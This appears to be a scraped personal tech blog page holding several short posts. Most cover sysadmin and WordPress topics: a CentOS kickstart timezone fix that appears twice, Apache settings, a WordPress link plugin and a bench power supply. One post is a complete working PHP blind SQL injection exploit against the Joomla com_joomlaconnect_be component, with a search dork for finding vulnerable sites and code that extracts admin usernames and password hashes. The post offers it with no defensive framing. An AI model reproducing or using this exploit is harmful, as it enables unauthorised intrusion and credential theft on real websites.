Feb 28

how to deal with broken time zones during a CentOS 5.3 kickstart

By jason Linux/Unix Oprating system No Comments »

Hello again fair readers !  Today’s quick tip concerns the problem with missing time zones when deploying CentOS 5.3 (and some of the more recent Fedoras) in a kickstart environment.  It’s a known problem, and unfortunately, since the source of the problem (an incomplete time zone data file) lies deep in the heart of the kickstart environment, fixing it directly is a distinct pain in the buttock region.

There is, however, a workaround – and it’s not even that messy !  The first step is to use a region that does exist, such as « Europe/Paris », which will satisfy the installer – then set the time zone to what you actually want after the fact in the « %post » section.  So, in the top section of the kickstart file, we’ll put :

# set temporarily to avoid time zone bug during install
timezone –utc Europe/ParisThe « –utc » switch simply states that the system clock is in UTC, which is pretty standard these days, but ultimately optional.  Next, in the %post section towards the end, we’ll shoe horn our little hack fix into place :

# fix faulty time zone setting
mv /etc/sysconfig/clock /etc/sysconfig/clock.BAD
sed ‘s@^ZONE="Europe/Paris"@ZONE="Etc/UTC"@’ /etc/sysconfig/clock.BAD > /etc/sysconfig/clock
/usr/sbin/tzdata-updateSo, what’s going on there ?  Let’s break it down :

•In the first line, we’re just backing up the original configuration file, to use in the next line…
•The second line is the important one – this is the actual manipulation which will fix the faulty time zone, setting it to whatever we want.  In this example « Etc/UTC » is used, but you can pick whatever is appropriate.
◦The tool being used here is « sed », a non-interactive editor which dates back to the 1970’s, and which is still used by system administrators around the world every day.
◦The command we’re issuing to sed is between the single quotes – astute readers will notice that it’s a regular expression, but with @’s instead of the more usual /’s.  In it, we simply state that the instance of « ZONE=”Europe/Paris” » is to be replaced with « ZONE=”Etc/UTC” ».
◦This change is to be made against the backup file, and outputted to the actual config.
•Finally, we run « tzdata-update » which, as you’ve no doubt guessed, updates the time zone data system-wide, based (in part) on the newly-corrected clock config.
And that, as they say, is that.  Happy kickstarting, friends, and i’ll see you next time !

Tagged with:
Feb 27

Homemade Bench top Power Supply

By jason Linux/Unix Oprating system No Comments »

I’ve always had an interest for electronics and recently I’ve been exploring my interests more. Last week I sorted through my tub of parts and placed them in individual draws. It took a good while to sort everything but I think it was worth it. I’ve seen power supplies built from PC power supplies before so I thought I’d build one my self. Thing is, I never really got around to it.

Yesterday I was feeling rather ambitious and decided to make a bench top power supply for small electronics. All the sites I found I have lost, so I kind of made it up as I went along. Most of them used ATX power supplies that are readily available, but I opted for the easy way out and used an AT with a hard on/off switch. At first this was the only reason I used it, but there are more advantages to using a AT over an ATX power supply for an external power supply. Firstly, it was cheap, well free actually. I took it from a PC that I had modified some time ago. I have a box full of AT power supplies in storage that I’ll get to some time and replace it. But I won’t be using the PC it came out of for a while, mostly because I have toaster ovens that are faster. Another reason it is better than a ATX is it has less voltages. The only voltages listed are 12v, 5v, -5v (7v) and GND. They vary in amps but are sufficient for what I will be using it for. It made it easy not to screw it up since there wasn’t many wires.

To make it was really easy. I took the top off. Drilled 4 holes in the case and inserted the insulated terminal, checking to make sure they didn’t ground out on the case. Cut most of the cables, leaving a couple of molex’s hanging out just in case I need them. I then soldered the remaining wires to a terminal by voltage (Yellow +12, Red +5, Red +/-5, Black GND.) It might not be the prettiest of them all, but I think it will do its job well.

Tagged with:
Feb 26

Joomla Component com_joomlaconnect_be Blind Injection Vulnerability

By jason Security Tools No Comments »

Test Code


#!/usr/bin/php
  <?php 

ini_set("max_execution_time",0); 

print_r(' 

########################################################################### 

[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability 

########################################################################### 

[»] Script:   [Joomla] 

[»] Language: [ PHP ] 

[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] 

[»] Greetz to:[ Spécial >>>>His0k4 >>>>   Tous les hackers Algérie 

[»] Dork: inurl:index.php?option=com_joomlaconnect_be 

########################################################################### 

########################################################################### 

# 

#  Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit 

#  [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 

# 

# 

########################################################################### 

'); 

if ($argc > 1) { 

$url = $argv[1]; 

$r = strlen(file_get_contents($url."+and+1=1--")); 

echo "\nExploiting:\n"; 

$w = strlen(file_get_contents($url."+and+1=0--")); 

$t = abs((100-($w/$r*100))); 

echo "Username: "; 

for ($i=1; $i <= 30; $i++) { 

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); 

   if (abs((100-($laenge/$r*100))) > $t-1) { 

      $count = $i; 

      $i = 30; 

   } 

} 

for ($j = 1; $j < $count; $j++) { 

   for ($i = 46; $i <= 122; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 122; 

      } 

   } 

} 

echo "\nPassword: "; 

for ($j = 1; $j <= 49; $j++) { 

   for ($i = 46; $i <= 102; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 102; 

      } 

   } 

} 

} 

?>
Tagged with:
Feb 25

9 ways to make WordPress easier to use for your clients

By jason Wordpress Tools 2 Comments »

If you use WordPress as a CMS for your clients’ websites, you’ve probably faced that issue: regular people find WordPress hard to use. Yes, it is quite user-friendly, but apparently not enough for people who double-click on links when browsing or worst, enter their website’s url in Google to get there. To make it easier for these people to maintain their own website, I would suggest the following tips.

1. Install an extended version of TinyMCE

tinymce advanced

This is one of the first things I realize that the person who will maintain the website is not internet-saavy. To avoid annoying “Where is the blablabla button?” question, just install this wordpress plugin and you’ll save some precious time when teaching how to use the WordPress admin. The TinyMCE advanced plugin gives you a setting page where you can add many buttons to the visual editor.

2. Add rich text to your widgets

rich-text-widget

Do you know what happens the first time your client tries to add an image in a sidebar widget? He calls you, usually when you have something much more important to finish. Hopefuly someone created this nifty little wordpress plugin to add rich-text widgets in your admin.

3. Make pages management easier

wordpress page management

Managing pages is a little too abstract in the regular WordPress for most clients, again there is a nice WordPress plugin that simplifies the pages management task by using a wonderful drag and drop interface.

4. Give them better control over the navigation

navigation control

This is not necessary for smaller sites with simple navigation, but it will be for websites using several navigations mixing categories and pages. With the WordPress Navigation List Plugin, your client takes full control over their navigation with an easy-to-use interface.

5. Give them limited permissions

advanced user permission

Your clients will never use some functionalities in WordPress, why should they even access them then? Installing the Adminize plugin will let you decide what your client can access, thus limiting the potential mistakes and decluttering the admin.

6. Simplify the WordPress admin’s interface

trim interface

Honestly this isn’t a hug improvement, but the Admin Trim Interface plugin will help your client to find his way faster by decluttering the interface.

7. Give them advanced control over the contact forms

contact form

Forms creation or modification are a quite complicated task for the regular internet user, to let your client work on his website’s forms, I would suggest one of these two plugins:

  • cforms II: the one I use on Designer Daily, it has a simple form admin area but can be a little annoying to upgrade (no auto upgrade).
  • Contact Form 7: a plugin I used on several clients websites, easy to install and configure.
8. Let them access stats from within the WordPress admin

google analyticator

Why would you do that? Simply because some clients are not too familiar with handling multiple accounts for web services, this will then make their life easier by giving them all the info they need in one place. For that I’d suggest these two plugins:

9. Use Windows Live Writer write blog.

概述

Tagged with:
Feb 25

WordPress Seo Plugin – SEO Smart Links

By jason Wordpress Plugins 2 Comments »

SEO Smart Links provides automatic SEO benefits for your site in addition to custom keyword lists, nofollow and much more.

SEO Smart Links can automatically link keywords and phrases in your posts and comments with corresponding posts, pages, categories and tags on your blog.

Further SEO Smart links allows you to set up your own keywords and set of matching URLs. Finally SEO Smart links allows you to set nofollow attribute and open links in new window.

It is a perfect solution to get your blog posts interlinked or add affiliate links to other sites.

Everything happens completely transparent, and you can edit the options from the administration settings panel.

The smart link plugin for WordPress lets you insert links using natural language rather than urls.

Without:

<a href="http://example.com">
  Example
</a>

With:

[Example->]

The resulting increase in usability is quite significant.

A Few Words On Autolink Plugins…

… since this was the initial idea behind smart links.

There are several autolink plugins around. aLinks is one of the better ones, if this is what you’d like to be using. They invariably suffer from one or two niggles:

  1. They’re too systematic: If your keyword shows 10 times in a text, it’ll get linked 10 times.
  2. There are time where it makes more sense to add a keyword link on an entire key phrase, and autolink plugins don’t allow this.

Smart links’ flexibility lets you work around both niggles.

Default Usage

The Basics

Using smart links, you insert links using an arrow in between brackets (the same syntax as the one used on several established newspaper websites):

[link text->link]

For instance, if you’re linking to a page called "dog training tips", you could end up writing:

[teach your puppy to sit->dog training tips]

The syntax is permissive: It’s case insensitive and impervious to extra spaces.

If your link text is the same as the link, you can simply close the bracket after the arrow:

[dog training tips->]

For reference, the syntax also works with normal urls and emails:

[goitworld->http://www.goitworld.com]
[Mickey->mickey@mouse.com]

Also for reference, "slugs" (the sanitized versions of titles that show in the url) work too:

[teach your puppy to sit->dog-training-tips]

These basics in mind, let’s hop to how they can become useful for SEO and site maintainability purposes.

How Smart Links Come In Handy

Smart links are useful in that they let you pre-insert links in your site.

The links get silenced when no relevant piece of information is found. They then mutate as the site evolves, in order to point to the most worthy piece of information at all time.

Suppose that you’re starting a dog training blog.

During the first week, you add a few posts and add smart links to "dog training tips". You know you’ll eventually write about this explicitly, so you might as well add the links as you create the posts.

Shortly after, you spend some time adding a bunch of bookmarks in the link manager. One of them is called "Dog Training Tips". The smart links, which were silenced until now (they were returning the text with no link), now point to the bookmark you’ve just entered.

You update the bookmark (you change it’s url to a better site you’ve just found) the next day, and the site updates without your even worrying about it.

Eventually, you write a post titled "Dog Training Tips" — and add a smart link to "Dog Training Tips" in it. The old posts are now pointing to this post instead, and the smart link in this post is pointing to your bookmark.

A week later, you write a new post called "Dog Training Tips". The smart links are now all pointing to this new post — because it is more recent than the first one.

At last, you create a section — a static page — called "Dog Training Tips", with a smart link to "Dog Training Tips" in it. All of the smart links are now pointing to this static page. The only exception is the "Dog Training Tips" smart link on that page, which is pointing to your bookmark.

If, upon revisiting your site a year later, you decide to turn the "Dog Training Tips" section into a subsection of "Dog Training", smart links will update themselves and point to the static page’s new url.

In other words:

  1. Smart Links seek to return a link to the bookmark with the same name.
  2. When posts with the same title exist, Smart Links will point to the most recent post instead.
  3. When a static page with the same title exists, Smart Links will point to that static page instead.
  4. On the post or static page that is supposed to get linked to, smart links will try to fallback to a bookmark (there’s no point in linking a web page to itself).
  5. When all else fails, Smart Links return the link text with no link.

Got it all so far? Onto smart link domains.

Advanced Usage

Smart Link Domains

Domains are areas where smart links scan are for relevant pieces of information. By default, smart links looks all over the place. But you can restrict smart links to certain domains, by using the following syntax:

[link text->link @ domain]

Implicit links work here as well:

[roll over->@ dog tricks]

Built-in domains include those related to WordPress:

  • posts
  • pages
  • entries (posts and pages)
  • links
  • wp (all of the above = the default domain)

For instance, you could write:

[teach your puppy to sit->dog training tips @ pages]

The above smart link would get silenced until you create a dog training tips page.

Other built-in domains include:

  • google
  • yahoo
  • msn
  • wiki

These create outbound links to the search queries on google, yahoo, msn, and wikipedia respectively.

The last set of built-in domains is dynamic. They let you restrict smart links to a section on your site.

Smart Links understands sections as static pages with no parents. When you use a section domain, only links to static pages within that section will be returned.

On semiologic.com, for instance:

  • [services->@services] would point to the services section
  • [services->@members] would point to a services page of the members’ area

These dynamic domains become tremendously useful when you start having multiple static pages with the same name on your site. Or when you wish to fine-tune where the smart links are pointing.

Text-Rendering Engine Transparency

The smart link syntax is transparent to Markdown and Textile syntax, but will not allow html code within smart links.

Class Attribute

If you want to add a class="external" attribute to outbond smart links, you need to use the external links plugin.

Title Attribute

Smart links use the page title, post title, category name, and link name as relevant.

Smart Link And Comments

Smart links are disabled in comments, to prevent spammers from bypassing anti-spam plugins.

Escaping Smart Links

You can escape the smart link by putting it in between backticks (`), e.g.:

  • `[escape the link->]` outputs:

    [escape the link->]

The backticks will be "used up" when the smart links are processed.

Smart Link Greediness

The smart link syntax is not greedy, e.g.:

  • [test1 [test2->/] ->/] outputs:

    [test1 test2 ->/]

Smart Link Plugins

If you feel like coding, you can register new smart link domains, like this:

smart_links::register_engine($domain, $callback);

The expected signature of domain handling callback functions is the following:

domain_engine($link) returns $links
  • $links is an array($look_for => $found)
  • $look_for is the reference that is looked for
  • $found is of course initialized to false

Download

This package is part of WordPress Plugin, and is access-restricted.

Smart Links v.4.2.2 (Jan 5th, 2010)

Requires WP 2.8. Tested up to 2.9.1.

Bleeding Edge Zip

Smart Links (Bleeding) v.4.2.2 (Jan 5th, 2010)

Requires WP 2.8. Tested up to 2.9.1.

Tagged with:
Feb 24

mod_rewrite with Fedora 10 and ISPConfig for WordPress

By jason Wordpress Tools 2 Comments »

This relates to Fedora 10 and ISPConfig 3.0.1 set up as described in this HowtoForge post One of my colleagues recently got interested in offering our clients WordPress as a content management system, so he’s been trying it out. Yesterday he found out that if he wanted to change the permalink style in WordPress he needed write access to .htaccess, which he didn’t have because the user rights haven’t been set up very well there. So I gave him write access by using

chown daemon:daemon .htaccess

Unfortunately this resulted in a 500 Interal Server Error. Looking at the error log for the website I tried this for it let me know that RewriteEngine directives were not allowed in the .htaccess. Since I didn’t want to mess with the base configurations of ISPConfig I started looking around for other options. Eventually I found that I had to add something similar to this to the Apache directives field under options under the website’s settings



<IfModule mod_rewrite.c>

<Directory /var/www/[sitename]/web/>

Options +FollowSymLinks

RewriteEngine On

RewriteBase /

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule . /index.php [L]

</Directory>

</IfModule>

Of course [sitename] should be replaced with the name of your website. It all works after I restarted the apache server myself, but I do not know if that is completely necessary. Also it might take a few seconds before ISPConfig finishes editing the configuration file.

Tagged with:
Feb 23

how to deal with broken time zones during a CentOS 5.3 kickstart

By jason Linux/Unix Oprating system No Comments »

Hello again fair readers !  Today’s quick tip concerns the problem with missing time zones when deploying CentOS 5.3 (and some of the more recent Fedoras) in a kickstart environment.  It’s a known problem, and unfortunately, since the source of the problem (an incomplete time zone data file) lies deep in the heart of the kickstart environment, fixing it directly is a distinct pain in the buttock region.

There is, however, a workaround – and it’s not even that messy !  The first step is to use a region that does exist, such as « Europe/Paris », which will satisfy the installer – then set the time zone to what you actually want after the fact in the « %post » section.  So, in the top section of the kickstart file, we’ll put :

# set temporarily to avoid time zone bug during install
timezone --utc Europe/Paris

The « –utc » switch simply states that the system clock is in UTC, which is pretty standard these days, but ultimately optional.  Next, in the %post section towards the end, we’ll shoe horn our little hack fix into place :


# fix faulty time zone setting 

mv /etc/sysconfig/clock /etc/sysconfig/clock.BAD 

sed 's@^ZONE="Europe/Paris"@ZONE="Etc/UTC"@' /etc/sysconfig/clock.BAD > /etc/sysconfig/clock 

/usr/sbin/tzdata-update

So, what’s going on there ?  Let’s break it down :

  • In the first line, we’re just backing up the original configuration file, to use in the next line…
  • The second line is the important one – this is the actual manipulation which will fix the faulty time zone, setting it to whatever we want.  In this example « Etc/UTC » is used, but you can pick whatever is appropriate.
    • The tool being used here is « sed », a non-interactive editor which dates back to the 1970’s, and which is still used by system administrators around the world every day.
    • The command we’re issuing to sed is between the single quotes – astute readers will notice that it’s a regular expression, but with @’s instead of the more usual /’s.  In it, we simply state that the instance of « ZONE=”Europe/Paris” » is to be replaced with « ZONE=”Etc/UTC” ».
    • This change is to be made against the backup file, and outputted to the actual config.
  • Finally, we run « tzdata-update » which, as you’ve no doubt guessed, updates the time zone data system-wide, based (in part) on the newly-corrected clock config.

And that, as they say, is that.  Happy kickstarting, friends, and i’ll see you next time !

Tagged with:
Feb 22

Remove lines that are in another file

By jason Linux/Unix Oprating system No Comments »

I had an issue this week where I needed to remove lines from one file if they existed in another file. Looking back it was frustrating as such a task should be simple.

I tried all sorts of things. Differencing the two files and using grep to grab the lines I wanted. Whatever I tried just did not produce the expected results. Thanks to a buddy I found the solution which ended up being to sort the two files before using diff.

Example:
Assuming two files exist, File_1 and File_2. File_1 containing lines with a, b, c and. File_2 containing b and d. If we want to remove b and d from File_1 because they exist in File_2 you could use something like the this:

owen@goit:~$ cat File_1.txt
a
b
c
d
owen@goit:~$ cat File_2.txt
b
d

owen@goit:~$ diff File_1.txt File_2.txt | grep \< | cut -d \  -f 2
a
c

That’s all fine and dandy until File_2.txt contains the same lines in a different order. Running the same command produces different results. See Below:

owen@goit:~$ cat File_2.txt
d
b

owen@goit:~$ diff File_1.txt File_2.txt | grep \< | cut -d \  -f 2
a
b
c

The solution as noted above is to use sort before hand and then difference them:

owen@goit:~$ sort File_1.txt >> File_1-sorted; sort File_2.txt >> File_2-sorted;
owen@goit:~$ diff File_1-sorted File_2-sorted | grep \< | cut -d \  -f 2
a
c

Obviously the example has been simplified, when dealing with thousands of lines the sort could take a while. With that said I’m sure there are more efficient ways to achieve the same results. I wouldn’t doubt there being a command better suited to do this. Have at it in the comments.

Tagged with:
Feb 22

Apache KeepAlive Timeout Tunning

By jason Apache Server 1 Comment »

Many of our readers are asking what KeepAliveTimeout setting should be used for Apache config. We usually select 2 to 5 seconds as it provides best performance for sites with medium visitors and prefer to use Nginx or any other front-end proxy to better manage thousands of multiple concurrent users.

Tagged with:
preload preload preload